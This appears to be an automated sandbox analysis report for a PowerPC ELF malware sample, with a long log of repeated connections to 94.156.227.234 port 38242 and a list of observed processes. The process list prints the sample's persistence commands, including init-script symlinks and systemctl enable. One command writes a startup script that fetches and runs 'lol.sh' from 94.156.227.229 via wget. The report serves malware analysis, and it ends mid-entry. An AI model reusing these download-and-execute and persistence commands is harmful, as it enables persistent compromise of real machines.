Dec 27, 2024 09:15:15.846801043 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:16.157566071 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:16.277110100 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:16.277199984 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:16.277400017 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:16.396848917 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:16.781405926 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:16.943046093 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:17.548021078 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:17.548252106 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:17.782479048 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:17.902244091 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:17.902400970 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:17.902441978 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:18.025223017 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:18.406653881 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:18.567236900 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:19.099028111 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:19.099200010 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:19.407883883 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:19.527534962 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:19.527686119 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:19.527710915 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:19.647310019 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:20.032561064 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:20.199018002 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:20.666914940 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:20.667042017 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:21.033770084 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:21.153287888 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:21.153371096 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:21.153387070 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:21.272900105 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:21.656938076 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:21.819072008 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:22.368685007 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:22.368767977 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:22.657840014 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:22.777389050 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:22.777486086 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:22.777518988 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:22.896985054 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:23.282649994 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:23.443047047 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:24.069003105 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:24.069190979 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:24.284534931 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:24.404057026 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:24.404278040 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:24.404334068 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:24.523857117 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:24.909332991 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:25.071053028 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:25.664619923 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:25.664868116 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:25.910959959 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:26.030559063 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:26.030818939 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:26.030951023 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:26.150377035 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:26.536915064 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:26.699074984 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:27.195244074 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:27.195369959 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:27.538469076 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:27.658029079 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:27.658143044 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:27.658214092 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:27.777651072 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:28.185467005 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:28.347094059 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:28.819380999 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:28.819518089 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:29.187284946 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:29.306898117 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:29.307018995 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:29.307091951 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:29.426552057 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:29.813236952 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:29.975080967 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:30.475779057 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:30.475882053 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:30.814420938 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:30.934103012 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:30.934277058 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:30.934345007 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:31.053790092 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:31.439555883 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:31.603132010 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:32.104161024 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:32.104274035 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:32.440666914 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:32.560360909 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:32.560473919 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:32.560563087 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:32.680085897 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:33.065908909 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:33.227226973 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:33.723864079 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:33.723964930 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:34.067302942 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:34.187243938 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:34.187509060 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:34.187509060 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:34.307157993 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:34.692234993 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:34.855139971 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:34.999424934 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:34.999625921 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:35.435411930 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:35.435544014 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:35.693500996 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:35.813258886 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:35.813662052 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:35.813662052 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:35.933557034 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:36.319772005 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:36.487135887 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:36.939527035 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:36.939810991 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:37.321465969 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:37.441257954 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:37.441632032 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:37.441632986 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:37.561711073 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:37.947143078 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:38.107170105 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:38.604708910 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:38.604852915 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:38.948555946 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:39.068203926 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:39.068459034 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:39.068512917 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:39.188162088 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:39.573427916 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:39.736002922 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:40.271518946 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:40.271615982 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:40.575567961 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:40.695641994 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:40.695938110 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:40.696060896 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:40.815640926 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:41.203011036 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:41.363174915 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:41.853236914 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:41.853312016 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:42.204761028 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:42.324493885 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:42.324620008 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:42.324697018 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:42.444809914 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:42.831358910 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:42.995197058 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:43.506899118 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:43.507126093 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:43.832535028 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:43.952349901 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:43.952476025 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:43.952531099 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:44.072197914 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:44.457462072 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:44.619231939 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:45.169123888 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:45.169202089 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:45.459203959 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:45.578943968 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:45.579068899 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:45.579121113 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:45.698710918 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:46.083925009 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:46.247196913 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:46.753623009 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:46.753716946 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:47.085310936 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:47.205027103 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:47.205161095 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:47.205238104 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:47.324882984 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:47.709836006 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:47.871099949 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:48.382467985 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:48.382607937 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:48.711044073 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:48.830703020 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:48.830760956 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:48.830961943 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:48.950438976 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:49.335997105 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:49.499264956 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:49.994424105 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:49.994534016 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:50.337291002 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:50.457443953 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:50.457532883 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:50.457571983 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:50.577049971 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:50.961971998 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:51.123286963 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:51.743705988 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:51.743851900 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:51.963120937 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:52.082751036 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:52.082829952 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:52.082865000 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:52.202378988 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:52.587603092 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:52.751234055 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:53.287478924 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:53.287614107 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:53.588674068 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:53.708192110 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:53.708286047 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:53.708368063 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:53.827982903 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:54.213468075 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:54.375245094 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:54.905900955 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:54.905996084 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:55.214735985 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:55.722238064 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:55.722373962 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:55.722456932 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:55.842040062 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:56.228235960 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:56.391196966 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:56.944562912 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:56.944684029 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:57.229940891 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:57.349673033 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:57.349788904 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:57.349849939 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:57.469521999 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 27, 2024 09:15:57.855070114 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:15:58.015294075 CET	38242	60156	94.156.227.234	192.168.2.23

System Behavior

Analysis Process: dash PID: 6186, Parent PID: 4331

General

Start time (UTC):	08:13:40
Start date (UTC):	27/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:13:40
Start date (UTC):	27/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.NYOJJEu7mM /tmp/tmp.D8D2Wtz1Eh /tmp/tmp.qqFC7OmFvK
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	08:13:40
Start date (UTC):	27/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:13:40
Start date (UTC):	27/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.NYOJJEu7mM /tmp/tmp.D8D2Wtz1Eh /tmp/tmp.qqFC7OmFvK
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/tmp/powerpc.nn.elf
Arguments:	/tmp/powerpc.nn.elf
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/tmp/powerpc.nn.elf
Arguments:	-
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable custom.service >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable custom.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/tmp/powerpc.nn.elf
Arguments:	-
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/system
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/tmp/powerpc.nn.elf
Arguments:	-
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/system /etc/rcS.d/S99system
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/tmp/powerpc.nn.elf
Arguments:	-
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "echo \"#!/bin/sh\n# /etc/init.d/powerpc.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting powerpc.nn.elf'\n /tmp/powerpc.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping powerpc.nn.elf'\n killall powerpc.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/powerpc.nn.elf"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/tmp/powerpc.nn.elf
Arguments:	-
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/powerpc.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:13:51
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:13:51
Start date (UTC):	27/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/powerpc.nn.elf
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	08:13:51
Start date (UTC):	27/12/2024
Path:	/tmp/powerpc.nn.elf
Arguments:	-
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Start time (UTC):	08:13:51
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:13:51
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:13:51
Start date (UTC):	27/12/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir -p /etc/rc.d
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Start time (UTC):	08:13:51
Start date (UTC):	27/12/2024
Path:	/tmp/powerpc.nn.elf
Arguments:	-
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Start time (UTC):	08:13:51
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:13:51
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:13:51
Start date (UTC):	27/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	08:13:51
Start date (UTC):	27/12/2024
Path:	/tmp/powerpc.nn.elf
Arguments:	-
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Start time (UTC):	08:13:51
Start date (UTC):	27/12/2024
Path:	/tmp/powerpc.nn.elf
Arguments:	-
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Start time (UTC):	08:13:51
Start date (UTC):	27/12/2024
Path:	/tmp/powerpc.nn.elf
Arguments:	-
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:13:50
Start date (UTC):	27/12/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	08:13:50
